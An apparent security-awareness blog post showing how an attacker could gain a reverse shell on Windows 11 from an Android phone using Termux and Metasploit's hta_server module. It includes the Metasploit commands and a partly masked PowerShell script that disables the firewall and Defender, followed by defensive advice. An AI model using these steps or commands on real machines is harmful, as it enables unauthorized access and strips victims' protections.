Security Advice: Preventing Unauthorized Access to Windows 11 in a Local Area Network Using an Android Phone
NOTE: Hello, this blog post has been written for the purpose of education and raising awareness about information security. It is essential to use authorized legal methods (White Box Test, Grey Box Test) as mentioned in this post. Our main focus is on the security advice section. Be sure to read that part.
Hello everyone, I continue to writing by following up-date technologies and attack scenarios for our secure in this blog page. We are discussing how cyber attackers hack Windows 11 using an Android phone.
System : Android 11 (Linux Kernel 4.14.190)
Target System : Windows 11 Pro
Tool Used By Cyber Attackers
Termux : Termux is debian distribution based terminal emulator for android operating system.
For example, we will examine the ‘exploit/windows/misc/hta_server’ vulnerability target using the Metasploit tool. A cyber attacker can exploit this vulnerability.
What is HTA extension ?
HTML Application’s abbreviation is HTA. An HTA is Microsoft Windows program that run Jscript and Vbscript. (Resource 6)
Check the local host ip address for web-based malware file (.hta) with help of ifconfig terminal command.
Terminal :
msfconsole
use exploit/windows/misc/hta_server
exploit
Target downloads the malware HTA file from attacker’s prepared the local host apache web server. This step is about social engineering. We are talking to about only technical steps.
Cyber criminal gets reverse shell with help of the android phone.(Figure 3) After, malicious person gets to control of the personal computer using the “shell” terminal command.
These steps were performed with Windows 11 Virus Threat Protection options turn off.(Figure 4)
If someone has physical access to your operating system, that malicious person can turn off Windows 11 Defender and Antivirüs Threat Protection with following commands or Powershell script.(Figure 5)
Terminal :
Set-ExecutionPolicy RemoteSigned
.\DefenderAntiVirusTurnOffScript.ps1
Following commands are Powershell commands in DefenderAntiVirusTurnOffScript.ps1
Set-Net****wallProfile -******* False
Set-MpPreference -DisableIntrusionPreventionSystem $true -********************* $true -****************Monitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -Enable*******Protection ********* -Force -MAPSReporting Disabled -SubmitSamplesConsent *********
This Powershell script part related, maybe how do cyber criminals hacks computer with USB flash drive.
Security Advices
- If any options are disabled in Windows 11 Defender, please enable them (Figure 4). Windows 11 Defender provides protection against many Metasploit exploits.
- If you are tempted to download an insecure file, you can scan it using Windows Defender or similar websites like VirusTotal.com. (Resource 4)
- Cybercriminals can utilize services like ngrok.com, serveo.net, and localtunnel.me for wide area network attacks. You can check the WAN to LAN firewall settings with the help of your router interface.
- You can check for insecure applications with the help of the Windows 11 Task Manager. For example, you should pay attention to applications such as cmd.exe and powershell.exe, as well as any running applications utilizing sockets.
- If you leave your computer unattended, malicious cybercriminals may attempt to turn off your Windows Defender or antivirus application. Be cautious in such scenarios.
- Do not allow anyone to insert a USB drive for auto-running malware on your personal computer.
ㅤㅤStay Safe.
Resources
1-https://hacknos.com/blog/termux-install-on-android-phone/
2-https://linuxhint.com/install-metasploit-in-termux/
3-https://www.rapid7.com/db/modules/exploit/windows/misc/hta_server/
4-https://www.google.com/search?q=virustotal+similar+alternatives
